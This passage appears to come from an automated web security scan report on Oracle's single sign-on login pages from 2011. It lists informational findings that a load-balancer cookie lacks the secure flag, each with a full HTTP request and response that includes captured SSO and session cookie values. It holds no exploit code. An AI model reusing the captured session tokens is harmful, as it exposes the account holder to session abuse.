RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 304
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBnj6uHK6EVADUS1EHWFB01t_c6
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.................................................................ST................XY............................TV............................PQ.................................................
...[SNIP]...

7.28. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-m-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-m-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 154
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpw6uHK6EVADUS1EHWFB01t_cE
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,...........`cY.C<.uE.rP..$.".KU1E..;

7.29. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/red-b-r.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/red-b-r.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 319
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXC986uHK6EVADUS1EHWFB01t_cg
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a............................................MO.......MN.......PQ.......ST.........................................................................................................................
...[SNIP]...

7.30. https://login.oracle.com/mysso/sso_loginui/sso_check.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/sso_check.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/sso_check.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 7352
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBOd6uHK6EVADUS1EHWFB01t_bJ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

<!--
//global js var
var isNav;

// on load, run this
function doLoad() {

MM_reloadPage(true);
isNav = (navigator.appName.indexOf("Netscape") !=-1);

//register event listeners
...[SNIP]...

7.31. https://login.oracle.com/mysso/sso_loginui/t-bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 271
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cA
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

7.32. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerloginadc_oracle_com_http

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFa